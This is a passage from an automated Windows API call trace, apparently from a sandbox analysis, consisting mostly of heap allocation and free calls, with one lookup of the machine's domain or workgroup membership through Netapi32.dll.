(HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe819b8 [0254.725] PeekMessageW (in: lpMsg=0x87f144, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f144) returned 0 [0254.725] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec480 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768a8 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41f0 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b378 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b360 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4270 [0254.726] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b360 | out: hHeap=0xc60000) returned 1 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4f8 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b360 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78e28 [0254.726] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b330 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b348 [0254.726] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78df8 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b300 [0254.726] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b318 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.726] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2d0 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2e8 [0254.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d98 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2a0 [0254.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2b8 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d68 [0254.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b270 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b288 [0254.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81a00 [0254.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xc60000) returned 1 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d38 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.727] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4220 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b240 [0254.727] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0254.727] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b258 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4eb0 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ea0 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4eb0 | out: hHeap=0xc60000) returned 1 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ea0 | out: hHeap=0xc60000) returned 1 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4f8 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ea0 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4eb0 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e90 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b258 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4eb0 | out: hHeap=0xc60000) returned 1 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e90 | out: hHeap=0xc60000) returned 1 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e90 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b258 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4eb0 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e80 [0254.728] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0254.728] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0254.729] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4eb0 | out: hHeap=0xc60000) returned 1 [0254.729] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0254.729] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e80 | out: hHeap=0xc60000) returned 1 [0254.729] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e80 [0254.729] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0254.729] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4eb0 [0254.729] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e70 [0254.729] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b258 [0254.729] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0254.729] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4eb0 | out: hHeap=0xc60000) returned 1 [0254.729] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0254.729] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e70 | out: hHeap=0xc60000) returned 1 [0254.729] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74500000 [0254.740] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b138 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e70 [0254.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x16) returned 0xd82430 [0254.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0xd82430, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0254.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b138 | out: hHeap=0xc60000) returned 1 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec548 [0254.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd82430 | out: hHeap=0xc60000) returned 1 [0254.741] GetProcAddress (hModule=0x74500000, lpProcName="NetGetJoinInformation") returned 0x74462c3f [0254.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec548 | out: hHeap=0xc60000) returned 1 [0254.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e70 | out: hHeap=0xc60000) returned 1 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec548 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e70 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4eb0 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e60 [0254.741] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20002) returned 0xf0aea0 [0254.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e70 | out: hHeap=0xc60000) returned 1 [0254.741] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4eb0 | out: hHeap=0xc60000) returned 1 [0254.742] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e60 | out: hHeap=0xc60000) returned 1 [0254.742] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec548 | out: hHeap=0xc60000) returned 1 [0254.742] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x87eae0, BufferType=0x87eaf8 | out: lpNameBuffer=0x87eae0*="WORKGROUP", BufferType=0x87eaf8) returned 0x0 [0254.743] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4eb0 [0254.743] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xee7f10 [0254.743] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b108 [0254.743] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78bb8 [0254.743] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b0c0 [0254.743] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b0d8 [0254.743] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e50 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b0d8 | out: hHeap=0xc60000) returned 1 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e50 | out: hHeap=0xc60000) returned 1 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b0c0 | out: hHeap=0xc60000) returned 1 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b0c0 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b0d8 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b88 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e50 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xf0aea0 | out: hHeap=0xc60000) returned 1 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b090 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b0a8 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b58 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e40 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78b58 | out: hHeap=0xc60000) returned 1 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e40 | out: hHeap=0xc60000) returned 1 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b0a8 | out: hHeap=0xc60000) returned 1 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b0a8 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78b58 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b060 [0254.744] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e40 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b060 | out: hHeap=0xc60000) returned 1 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e40 | out: hHeap=0xc60000) returned 1 [0254.744] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78b58 | out: hHeap=0xc60000) returned 1 [0254.744] FreeLibrary (hLibModule=0x74500000) returned 1 [0254.747] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ea0 | out: hHeap=0xc60000) returned 1 [0254.747] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e90 | out: hHeap=0xc60000) returned 1 [0254.747] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e80 | out: hHeap=0xc60000) returned 1 [0254.747] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xc60000) returned 1 [0254.747] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b240 | out: hHeap=0xc60000) returned 1 [0254.747] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78e28 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b360 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b348 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b330 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b300 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78df8 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b318 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2e8 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2d0 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2a0 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d98 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d68 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2b8 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b288 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b270 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d38 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81a00 | out: hHeap=0xc60000) returned 1 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4270 | out: hHeap=0xc60000) returned 1 [0254.748] PeekMessageW (in: lpMsg=0x87f144, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f144) returned 0 [0254.748] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4270 [0254.748] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xee8130 [0254.748] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4220 [0254.748] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee8130 | out: hHeap=0xc60000) returned 1 [0254.749] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.749] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4270 | out: hHeap=0xc60000) returned 1 [0254.749] PeekMessageW (in: lpMsg=0x87f144, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f144) returned 0 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4f8 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d38 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4270 [0254.749] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d38 | out: hHeap=0xc60000) returned 1 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d38 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b270 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4220 [0254.749] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b270 | out: hHeap=0xc60000) returned 1 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e80 [0254.749] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e80 | out: hHeap=0xc60000) returned 1 [0254.749] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0254.749] PeekMessageW (in: lpMsg=0x87f144, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f144) returned 0 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec6b0 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b270 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4220 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b288 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2b8 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e80 [0254.749] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2b8 | out: hHeap=0xc60000) returned 1 [0254.749] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec6d8 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2b8 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e90 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d68 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4ea0 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec1c08 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e40 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec700 [0254.750] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0254.750] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec700 | out: hHeap=0xc60000) returned 1 [0254.750] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e40 | out: hHeap=0xc60000) returned 1 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec700 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xed4e40 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec728 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d98 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e30 [0254.750] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e30 | out: hHeap=0xc60000) returned 1 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b2a0 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec750 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2d0 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e30 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2e8 [0254.750] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81a00 [0254.751] PeekMessageW (in: lpMsg=0x87eaf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eaf4) returned 0 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec778 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b318 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e20 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78df8 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e10 [0254.751] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78df8 | out: hHeap=0xc60000) returned 1 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec7a0 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78df8 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b300 [0254.751] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b330 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b348 [0254.751] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b360 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.751] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78e28 [0254.751] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b240 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b138 [0254.752] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b1c8 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.752] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78c78 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b180 [0254.752] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, 